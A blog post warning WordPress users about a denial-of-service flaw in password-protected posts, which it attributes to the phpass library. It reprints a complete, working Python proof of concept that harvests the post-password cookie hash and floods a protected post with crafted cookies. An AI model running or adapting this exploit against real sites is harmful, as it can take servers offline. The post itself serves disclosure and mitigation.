WordPress Password Post DoS Vulnerability

Hey guys, it’s a bad day when I get things like this in my inbox:

# Proof of Concept
# WordPress 3.5.1
# Denial of Service
# Author: vnd at vndh.net
import httplib
import re

def get_cookie_hash(hostname, wplogin):
    headers = {'Content-type': 'application/x-www-form-urlencoded'}
    handler = httplib.HTTPConnection(hostname)
    handler.request('POST', wplogin, 'action=postpass&post_password=none', headers=headers)
    response = handler.getresponse()
    set_cookie = response.getheader('set-cookie')
    if set_cookie is None: raise RuntimeError('cannot fetch set-cookie header')

    pattern = re.compile('wp-postpass_([0-9a-f]{32})')
    result = pattern.search(set_cookie)
    if result is None: raise RuntimeError('cannot fetch cookie hash')

    return result.groups()[0]

def send_request(hostname, post, cookie_name):
    headers = {'Cookie': 'wp-postpass_%s=%%24P%%24Spaddding' % cookie_name}
    handler = httplib.HTTPConnection(hostname)
    handler.request('GET', post, 'action=postpass&post_password=asdf', headers=headers)

if __name__ == '__main__':
    hostname = 'wordpress.remote'
    wplogin = '/wp-login.php'
    posturl = '/?p=4' # link to password protected post
    requests = 1000

    cookie_hash = get_cookie_hash(hostname, wplogin)
    print '[+] received cookie hash: %s' % cookie_hash
    for i in xrange(requests):
        print '[+] sending request %d...' % (i + 1)
        send_request(hostname, posturl, cookie_hash)

It’s even worse when I run the code and the target server crashes and burns.

I wanted to make everyone else in the WordPress community aware that this threat is very real. I’ve tested it on 3.1, 3.5, and 3.6 – all very vulnerable – and I would guess that versions below 3 are also vulnerable. If you are using password protected posts, you’ll want to go reverse that setting on each post. This exploit, though targeted, will completely cripple your server if run against it.

The WP Core Team is working on a patch which will fix this – however, the solution that Krzysztof provided at https://vndh.net/note:wordpress-351-denial-service did not work for me, the vulnerability remained. My guess is Krzysztof had a more powerful server which was able to overcome the attack. In the case of most shared hosts and/or less-scaled servers, the fix will not help. Based on the nature of how the attack works, this jumps out at me as the reason.

SIDENOTE: This isn’t actually a vulnerability in WordPress, it’s in the phpass library that WordPress uses. I’m guessing there are other very vulnerable software packages out there.

Anyways, until 3.6 you might want to refrain from using any password protected posts. Good luck!

Leave a Reply